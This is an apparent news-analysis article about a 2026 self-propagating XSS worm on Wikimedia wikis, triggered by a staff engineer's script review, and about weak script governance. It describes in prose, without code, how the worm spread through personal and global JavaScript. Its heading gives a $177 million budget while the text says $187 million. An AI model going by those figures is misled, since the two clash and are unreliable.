Nearly Right

Wikipedia's own security review triggered the breach it was meant to prevent

A dormant worm, a privileged account, and the systemic vulnerabilities of the internet's most important encyclopaedia

On 5 March 2026, a staff security engineer at the Wikimedia Foundation sat down to conduct a routine review of user-authored code on Wikipedia. The task was straightforward enough: evaluate the sprawling ecosystem of custom JavaScript scripts that Wikipedia's editors rely upon to customise their experience. To do this efficiently, the engineer began loading a batch of random user scripts into his own account's global JavaScript configuration. He did not create test scripts for the purpose. He did not use a sandboxed environment. He loaded the scripts under his highly privileged Wikimedia Foundation staff account, one with permissions to edit the global CSS and JavaScript that executes on every single page across every Wikimedia project.

One of the scripts he loaded was two years old, uploaded to Russian Wikipedia in March 2024 by a user called Ololoshka562. It had sat dormant since then, unreviewed and unnoticed. Within seconds of execution, it began to spread.

Twenty-three minutes of chaos

The script was a self-propagating XSS worm, and it worked with brutal efficiency. Once activated, it attempted two things simultaneously. First, it overwrote the infected user's personal common.js file with a loader that would re-execute the malicious code every time they browsed the wiki. Second, and far more destructively, if the infected user held sufficient privileges, it edited the global MediaWiki:Common.js script, which runs for every logged-in editor on the site. Because the security engineer's account had exactly those privileges, the worm achieved global persistence almost instantly.

From there, the infection cascaded. Every editor whose browser loaded the compromised global script became a new carrier. The worm copied itself into their personal scripts, then used their session credentials to vandalise random articles, inserting a grotesquely oversized image and hidden JavaScript. If an infected user happened to be an administrator, the worm went further still, abusing Wikipedia's Special:Nuke page to mass-delete articles from the global namespace.

According to BleepingComputer's analysis, approximately 3,996 pages were modified and around 85 users had their common.js files replaced before engineers contained the outbreak. The Wikimedia Foundation's system reliability engineering team switched all wiki projects to read-only mode, forcibly disabled user JavaScript across the platform, and began the painstaking work of reverting every malicious edit. The entire episode, from activation to containment, lasted 23 minutes.

The worm itself was not sophisticated. Security researchers who examined the code noted it used jQuery, a library that speaks to its vintage rather than any technical ambition. It referenced an external domain, basemetrika.ru, that did not even resolve to an active server, suggesting either a programming error by the original author or a payload delivery mechanism that had long since expired. There was something almost quaint about it, a classical virus concerned with vandalism and spectacle rather than the silent data exfiltration or cryptocurrency mining that characterises modern malware. It belonged to a known family of attacks in the Russian Wikipedia community called "woodpecker" scripts, a type of worm that had been used to deface smaller MediaWiki installations for over a decade. The earliest variants date to at least 2007. This was old ordnance, not a precision weapon.

The ghost of MySpace past

For anyone with a long memory in web security, the incident carried an unmistakable echo. In October 2005, a 19-year-old hacker named Samy Kamkar inserted a small piece of JavaScript into his MySpace profile. Within 20 hours, over a million users had unknowingly added him as a friend. The Samy worm, as it became known, was the first major XSS worm to make headlines, and it rewrote the rules of web application security overnight. Jeremiah Grossman, then a leading web security researcher, later described it as the moment the entire industry had been waiting for. At the time, an estimated 80 to 90 per cent of websites were vulnerable to similar attacks.

Twenty-one years later, Wikipedia fell to the same category of exploit. The technical specifics differ, but the underlying pattern is identical: a platform that allows users to embed executable code in pages, inadequate sanitisation of that code, and a propagation mechanism that turns every visitor into an unwitting accomplice. That a top-ten global website remained vulnerable to a class of attack first demonstrated on MySpace speaks to something more fundamental than a single engineer's mistake.

A $177 million organisation with volunteer-grade security

The Wikimedia Foundation's annual budget for the 2025-26 fiscal year runs to roughly $187 million. It employs hundreds of staff, operates data centres serving billions of page views per month, and maintains one of the most consequential information resources in human history. By any measure, it is a substantial institution.

Its security architecture, however, still bears the fingerprints of the scrappy volunteer project Wikipedia was in 2001. The user scripting system at the heart of this incident is a case in point. MediaWiki, the software that powers Wikipedia, allows any registered user to create personal JavaScript and CSS files that execute in their browser whenever they visit the site. For editors with "interface administrator" privileges, a small group of just 15 on English Wikipedia, the power extends to editing global scripts that run for every user. Mandatory two-factor authentication for this group was introduced only a few years ago. No code review process exists for changes to these scripts. There is no sandboxing, no content security policy enforcement, no automated scanning for malicious patterns.

This is not an oversight that nobody noticed. Wikipedia's own documentation for interface administrators states plainly that the ability to edit JavaScript executed in other users' browsers is "very powerful, and extremely dangerous in the hands of a malicious user." The danger has been named and acknowledged for years. But naming a risk and governing it are different things entirely. Wikipedia's editing community has long taken a cavalier attitude towards security, and the reasons are structural rather than negligent. Most editors are not professional developers. They are historians, linguists, hobbyists, and obsessives who came to write an encyclopaedia, not to manage an attack surface. When the Foundation has attempted to impose restrictions on scripting, editors have tended to interpret the move as a power grab, an attempt by paid staff to wrest control from the volunteers who actually produce the content. The result is an ecosystem of unsandboxed JavaScript gadgets, many maintained by long-abandoned user accounts, powering the editing tools that Wikipedia's most active contributors depend upon daily.

Rebar in the concrete

The Atlantic Council published a report comparing open-source software to the rebar inside reinforced concrete, the catenary wires above an electric train, or the water treatment plants that ensure safe drinking water. It is structurally critical, hidden from end users, and chronically underappreciated. The analogy extends uncomfortably well to Wikipedia's scripting infrastructure. The custom JavaScript that editors rely upon is not a cosmetic feature. It provides editing tools, moderation utilities, and workflow automation that the Wikimedia Foundation has been too slow to build into the official software. Without these scripts, many of Wikipedia's most productive editors would find the platform significantly harder to use.

This creates a dependency trap. The volunteer-authored scripts are essential, but they exist outside any formal security governance. They are not audited, not version-controlled in any meaningful way, and not subject to the kind of review that professional software development demands. The worm that lay dormant on Russian Wikipedia for two years was sitting in precisely this ungoverned space. Nobody checked it because nobody checks any of them, at least not systematically.

The parallel to the broader open-source security crisis is exact. When the Log4Shell vulnerability was discovered in the Apache Log4j library in December 2021, it sent shockwaves through the technology industry. The library was maintained by a small group of volunteers and was embedded in software used by governments and corporations worldwide. The US Cybersecurity and Infrastructure Security Agency subsequently classified open-source software security as a critical infrastructure concern. A 2022 survey by Tidelift found that more than half of open-source maintainers described themselves as unpaid hobbyists.

Wikipedia's user script ecosystem is a microcosm of this larger problem, but with an additional complication. In most open-source projects, the governance gap exists because nobody is paying attention. At Wikipedia, the Foundation is paying attention; it simply lacks the political capital to act. Editors, who are volunteers and who produce all of Wikipedia's content, resist security measures they perceive as restrictions on their autonomy. The Foundation, which depends entirely on those volunteers, is reluctant to force the issue.

The organisational accident

Safety engineers who study industrial disasters have a term for what happened on 5 March: a "normal accident." Charles Perrow coined the phrase in 1984, after studying the Three Mile Island nuclear incident, to describe failures that emerge inevitably from the interaction of complex, tightly coupled systems. The components of the system may each function as designed, but their interaction produces catastrophe. The Wikipedia incident fits the pattern with uncomfortable precision. A security engineer conducted a test. The test involved loading user scripts. The scripts included a dormant worm. The engineer's account had global privileges. The worm exploited those privileges to achieve platform-wide persistence. Every individual element of this chain was, by Wikipedia's existing standards, permitted. The system was not broken by an intruder. It was broken by someone doing their job, in the way the system allowed them to do it.

This is what distinguishes the incident from a conventional security breach. The attacker, such as there was one, was a volunteer script author who had uploaded malicious code two years earlier and apparently forgotten about it. The vector was not a sophisticated hack but a predictable consequence of a system that permits privileged users to execute arbitrary, unreviewed code. It is tempting to blame the individual engineer, and his decision to run random scripts under a privileged account was indefensible on its own terms. But focusing on his lapse misses the point. He was the proximate cause; the organisation built the conditions. A system that allows a single routine test to cascade into a platform-wide compromise is a system that has already failed. It was merely waiting for someone to demonstrate it.

The case for restraint

It would be easy to catastrophise. Wikipedia was not, in fact, seriously harmed. The worm affected Meta-Wiki, a coordination site, rather than the encyclopaedia itself. The Foundation's response was swift, with read-only mode imposed within minutes and the situation fully resolved within hours. No personal data was compromised. All deleted articles were restored. The 23-minute window of active infection was remarkably short, a testament to the monitoring systems that did exist and the speed of the engineering team.

The scripting system, for all its risks, delivers genuine value. Wikipedia's official development pipeline is notoriously slow, constrained by the Foundation's limited engineering resources and the difficulty of building for a platform with hundreds of language editions and wildly varying community needs. User scripts fill the gap. Tools like Twinkle, which streamlines anti-vandalism work, or the various citation-formatting scripts that editors rely upon, were all built by volunteers using precisely the system that the worm exploited. Restricting it without providing alternatives would hobble the editors who keep Wikipedia functioning.

The tension is real, and anyone who proposes a simple fix is not taking the problem seriously.

What would actually help

The Wikimedia Foundation's official statement promised "additional security measures" developed "in consultation with the community." The details remain unspecified. But the broad outlines of what credible reform would look like are not mysterious. Mandatory code review for changes to global JavaScript would be the most obvious step, analogous to the pull request workflow that is standard practice in virtually every professional software project. A content security policy restricting which scripts can execute in editors' browsers would limit the blast radius of any future compromise. Automated scanning of user script pages for known malicious patterns could catch dormant threats like the one that sat undetected for two years. And the principle of least privilege, the idea that accounts should have only the permissions they actually need for a given task, should be enforced ruthlessly for Foundation staff accounts.

None of these measures would be painless. Code review introduces friction. Content security policies break existing workflows. Automated scanning produces false positives. And least privilege means that a security engineer conducting a test cannot simply use their all-powerful staff account because it is convenient. Each of these changes would face resistance from a community that prizes autonomy and views bureaucratic process with suspicion.

But the alternative is to wait for the next worm. The one uploaded to Russian Wikipedia two years ago was, by the admission of everyone who examined it, crude and largely ineffective. Its external payload domain did not even exist. The vandalism it produced was conspicuous and easily reversed. A more sophisticated attacker, one who harvested session tokens silently, or who exfiltrated editor credentials through browser autofill exploitation, or who subtly altered article content rather than defacing it with oversized images, could have caused damage that was neither visible nor reversible in 23 minutes.

Wikipedia turned 25 in January. It has grown from a quirky experiment in collective knowledge-building to a foundational piece of the internet's information infrastructure, referenced by search engines, cited by journalists, scraped by artificial intelligence companies training their models. The world treats it as critical infrastructure. It is past time for its security governance to reflect that reality.

#cybersecurity